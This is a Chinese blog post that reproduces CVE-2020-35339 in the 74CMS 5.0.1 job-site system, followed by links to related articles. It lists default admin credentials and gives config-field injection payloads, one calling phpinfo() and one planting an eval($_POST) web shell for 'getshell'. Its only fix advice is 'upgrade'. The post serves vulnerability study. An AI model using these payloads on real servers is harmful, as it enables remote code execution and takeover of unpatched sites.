骑士cms任意代码执行(CVE-2020-35339)

已于 2024-02-23 10:53:25 修改
阅读量537 收藏 9
点赞数 8
文章标签: 服务器 运维
于 2024-01-02 10:23:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135334642
版权

漏洞描述:

在74CMS 5.0.1版本中的管理后台由于过滤不严谨,可以向配置文件写入恶意代码导致任意代码执行。

复现过程:

1.访问ip:port

2.访问后台登录页面

http://ip:port/index.php?m=Admin

账号:adminadmin

密码:adminadmin

3.进入后台后,点击:系统——网站配置——在网站域名中填写下面数据使页面返回phpinfo

http://127.0.0.1/.',phpinfo(),'/.com

4.然后保存,保存后刷新当前页面,phpinfo页面便映入眼帘

5.此时再进行登录,登录成功后,只会显示更详细的phpinfo界面,没有其他内容,建议不要随便使用。
然后修改一下代码,便可以直接getshell

6.修改回原先配置信息

7.添加php代码

http://127.0.0.1/.',eval($_POST[a]),'/.com

8.Getshell

修复建议:

升级版本。

慕筱蚺
关注
骑士cms骑士cms快速搭建
xiaomaseo的博客
03-23 1732
骑士cms,如何让人才网快速建站,人才招聘一直是一个有市场的行业,特别是近些年来互联网发展的速度越来越快,人才招聘的重心在不断的向线上招聘转移,骑士cms的作用就是为人才网站提供人才招聘的各项功能,在这种阶段可以选用骑士cms系统的基础版,通过一系列基础的发布职位、下载简历、职位置顶、简历置顶等实用功能,能够保证人才网站在低成本运营的同时还有机会实现流量转化。 骑士cms可以实现云端一键升级,告别传统的FTP上传下载的覆盖升级方式,现在只需骑士cms后台一键完成升级。使用简单便捷,支持升级回滚操.
CVE-2020-8163:CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码
03-09
CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码 在Rails <5.0.1中远程执行用户提供的本地名称 5.0.1之前的Rails版本中存在一个漏洞,该漏洞将允许攻击者控制render调用的locals参数。 已为该漏洞...
vulfocus——骑士cms任意代码执行(CVE-2020-35339
m0_62063669的博客
09-17 980
5.访问shell地址:/Application/Home/Conf/config.php。骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。(不知道这里为什么没出现flag,然后在phpinfo找到flag)后台账号密码均为adminadmin。4.构造Payload验证漏洞存在。6.getshell (改包)3.在第三步进行抓包。2.找到后台登陆界面。
骑士cms任意代码执行
weixin_46801402的博客
11-02 411
骑士cms任意代码执行
CVE-2020-11890:CVE-2020-11890
03-10
CVE-2020-11890:用户组表类中的输入验证不正确可能会导致RCE的ACL配置损坏 关联 PoC 受影响的版本:3.9.17之前的Joomla核心 用户要求:管理员帐户(非超级管理员) 获得访问权限:创建一个新的超级管理员,然后触发...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
骑士cms(74CMS)高效人才招聘系统 v5.0.1 正式版.zip
07-16
骑士cms(74CMS)高效人才招聘系统 v5.0.1 正式版  更新日志  新增:后台增加跳转页面 新增:短信预警提醒,方便客户及时充值 新增:企业与个人账号通用 新增:未付费且登录的企业单独呈现,方便追踪客户 新增:后台统计增加列表页。方便追踪客户 新增:导出简历增加时间段、年龄段、性别等条件筛选 新增:简历增加项目经验 新增:PC端支持https 新增:对接企查查 新增:关注公众号领红包,快速吸粉 新增:专题招聘会触屏版 新增:事业单位招考触屏版 新增:企业专访触屏版 新增:内置节日主题 优化:表单填写 优化:提交操作增加等待提醒 优化:套餐改为点数,对简历进行分级收费 优化:小程序深度优化 优化:系统日志显示企业名称与个人名字,方便追踪客户 骑士PHP人才系统简介 骑士PHP人才系统(74cms)是一项基于PHP MYSQL为核心开发的一套免费 开源专业人才系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。凭借骑士网络的不断创新精神和认真的工作态度,相信骑士能够为您带来全新的使用体验! 骑士PHP人才系统功能特征: 多模式,更加灵活 用户可以自由选择积分模式和服务套餐模式,积分模式更灵活,套餐模式更直观。 模板机制,轻松改版 全新的模板引擎机制,界面完全与程序分离,管理员可轻松制作模板和在后台切换模板。 在线支付,无人值守 集成网上支付,自动收款并开通相关服务,自动充值,自动开通。 搜索优化,完美植入 灵活自定义URL,自定义目录结构,自定义关键字,有效提高搜索引擎排名。 集成火车头,自动采集 定时定点采集各大招聘网站的信息,实时自动发布信息。 使用简单,功能强大 软件使用简单灵活,功能强大,更多优秀模块陆续开发中。 骑士PHP人才系统前台页面: 骑士PHP人才系统后管理 后台路径:/admin/admin_index.php 用户名与密码:admin(安装时可以设置) 后台页面: 相关阅读 同类推荐:人才招聘系统
骑士cms 版模板
12-30
骑士cms 版模板
骑士CMSPHP人才系统源码(74cms)v4.2.111正式版
07-25
骑士cms人才系统是一项基于PHP MYSQL为核心开发的一套免费 开源专业人才招聘系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创,有着完全的知识产权。凭借骑士网络的不断创新精神和认真的工作态度,骑士人才系统已成国内同类软件中的最好用的人才系统。 骑士cms人才系统 v4.2.66 更新内容: 修正 首页滚动条只允许审核通过的显示 修正 后
骑士cms 3.7多城市企业版源码,非常棒的php人才系统,自带4套模板,74cms V3.7 分站版
11-20
(一) 运行环境需求: 可用的 httpd 服务器(如 Apache、IIS 等) PHP 5.0 及以上 MySQL 5.0 及以上 (二) 安装步骤: (1) Linux 或 Freebsd 服务器下安装方法。 第一步:使用ftp工具,将upload文件夹内所有文件上传至你的网站空间。 第二步:先确认将以下目录以及子目录属性设置为 (777) 可写模式。 uploads/ 'data', 'data/avatar', 'data/backup', 'data/certificate', 'data/comads', 'data/companyimg', 'data/contactimgfont', 'data/credent_photo', 'data/font', 'data/hrtools', 'data/hunter', 'data/images', 'data/images/thumb', 'data/link', 'data/logo', 'data/photo', 'data/photo/thumb', 'data/sessions', 'data/setmealimg', 'data/shop', 'data/train_certificate', 'data/train_img', 'data/train_logo', 'data/train_teachers', 'data/weixin', 'data/word', 'data/wxpay', 'data/wzp', 'temp', 'temp/caches', 'temp/templates_c', 'temp/backup_templates', 'templates', 'admin/statement', 'install' 第三步:运行 http://yourwebsite/安装目录/install,填入安装相关信息与资料,完成安装! (2) Windows 服务器下安装方法。 第一步:使用ftp工具,将该软件包里的目录及其文件上传到您的空间。 第二步:运行 http://yourwebsite/安装目录/install,填入安装相关信息与资料,完成安装! (3) 后台管理地址 http://yourwebsite/安装目录/admin 后台目录默认是admin,安装后建议尽快更改 (4) 安装完成,请删除install文件夹 (三) 使用说明 未获商业授权之前,不得将本软件用于任何用途。购买商业授权请登录http://www.74cms.com 参考相关说明。 获得商业授权之后,您可以将本软件应用于商业用途,同时依据所购买的授权类型中确定的技术支持内容,自购买时刻起,在技术支持期限内拥有通过指定的方式获得指定范围内的技术支持服务。商业授权用户享有反映和提出意见的权力,相关意见将被作为首要考虑,但没有一定被采纳的承诺或保证。 (四) 相关帮助: 官方网站:http://www.74cms.com/ 官方论坛:http://www.74cms.com/bbs
最新骑士人才系统 74cms V4.2.3 单城市商业版源码分享,含3套模板,求职招聘系统源码
03-25
最新骑士人才系统 74cms V4.2.3 单城市商业版源码分享,含3套模板,求职招聘系统源码
74cms 任意代码执行CVE-2020-35339
最新发布
weixin_44047654的博客
11-22 1206
74cms 任意代码执行CVE-2020-35339
74CMS 5.0.1后台getshell(CVE-2020-35339)分析
qq_41252520的博客
02-18 2869
0x0 漏洞简介 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。为个人求职和企业招聘提供信息化解决方案, 骑士人才系统具备执行效率高、模板切换自由、后台管理功能灵活、模块功能强大等特点,自上线以来一直是职场人士、企业HR青睐的求职招聘平台。经过7年的发展,骑士人才系统已成国内人才系统行业的排头兵。系统应用涉及政府、企业、科研教育和媒体等行业领域,用户已覆盖国内所有省份和地区。 2016年全新推出骑士人才系统基础版,全新的
在线复现漏洞cve-2020-35339(加日常想法)
FODKING的博客
04-20 1435
最近有半年没写了,感觉有很多东西想写,还是怕没人看,近期发现了一个在线的漏洞测试平台,大家可以看看。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值